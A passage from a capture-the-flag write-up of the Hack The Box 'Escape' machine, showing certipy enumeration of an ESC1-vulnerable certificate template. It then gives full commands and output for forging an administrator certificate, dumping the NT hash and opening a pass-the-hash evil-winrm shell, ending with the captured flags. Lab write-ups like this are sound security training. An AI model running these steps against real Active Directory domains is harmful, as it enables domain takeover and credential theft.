Certificate Authorities                                                                                                                                                    
  0                                                                                                                                                                        
    CA Name                             : sequel-DC-CA                                                                                                                     
    DNS Name                            : dc.sequel.htb                                                                                                                    
    Certificate Subject                 : CN=sequel-DC-CA, DC=sequel, DC=htb                                                                                               
    Certificate Serial Number           : 1EF2FA9A7E6EADAD4F5382F4CE283101                                                                                                 
    Certificate Validity Start          : 2022-11-18 20:58:46+00:00                                                                                                        
    Certificate Validity End            : 2121-11-18 21:08:46+00:00                                                                                                        
    Web Enrollment                                                                                                                                                         
      HTTP                                                                                                                                                                 
        Enabled                         : False                                                                                                                            
      HTTPS                                                                                                                                                                
        Enabled                         : False                                                                                                                            
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : SEQUEL.HTB\Administrators
      Access Rights
        ManageCa                        : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        ManageCertificates              : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        Enroll                          : SEQUEL.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : UserAuthentication
    Display Name                        : UserAuthentication
    Certificate Authorities             : sequel-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Client Authentication
                                          Secure Email
                                          Encrypting File System
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 10 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2022-11-18T21:10:22+00:00
    Template Last Modified              : 2024-01-19T00:26:38+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Domain Users
                                          SEQUEL.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : SEQUEL.HTB\Administrator
        Full Control Principals         : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        Write Owner Principals          : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        Write Dacl Principals           : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        Write Property Enroll           : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Domain Users
                                          SEQUEL.HTB\Enterprise Admins
    [+] User Enrollable Principals      : SEQUEL.HTB\Domain Users
    [!] Vulnerabilities
      ESC1                              : Enrollee supplies subject and template allows client authentication.

By looking at the template we can confirm that this is not false positive by certipy-ad, because we as domain users can enroll in that template, also anotehr key aspect is EKU (extended key usage) has the value of client authentication, and finally we can notice the EnrolleeSuppliesSubject value in the certificate name flag which allows us to specify any UPN when requesting a certificate.

We will request a certificate for the administrator using the same tool:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ certipy-ad req -username ryan.cooper@sequel.htb -password NuclearMosquito3 -target-ip 10.129.128.53 -ca sequel-DC-CA -template UserAuthentication -upn administrator@se
quel.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: SEQUEL.HTB.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 13
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

We recieved the pfx file of the administrator, we can use this pfx file to authenticate using certipy-ad, and it will get the TGT of the administrator, and dump his ntlm hash:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ certipy-ad auth -pfx administrator.pfx -username administrator -domain sequel.htb -dc-ip 10.129.128.53
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@sequel.htb'
[*] Using principal: 'administrator@sequel.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee

We can now authenticate using the administrator ntlm hash:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ evil-winrm -i 10.129.128.53 -u administrator -H a52f78e4c751e5f5e17e1e9f3e58f4ee
                                         
Evil-WinRM shell v3.7
                                         
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                         
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                         
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
dc
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::e158:c196:2a15:f372
   Link-local IPv6 Address . . . . . : fe80::e158:c196:2a15:f372%4
   IPv4 Address. . . . . . . . . . . : 10.129.128.53
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%4
                                       10.129.0.1

Here we can get the flags:

*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
9d57379bb44b21297dab730176c81157
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\ryan.cooper\Desktop\user.txt
ac5eae2c8f5e9b0438a0b9833bf44522

PreviousCicada NextAdministrator

Last updated 4 months ago

hashtagEnumeration:

hashtagPort Scanning:

hashtagShares:

hashtagExploitation:

hashtagShell as sql_svc:

hashtagLateral Movement to ryan.cooper:

hashtagBloodHound:

hashtagPost-Exploitation:

hashtagADCS Abuse: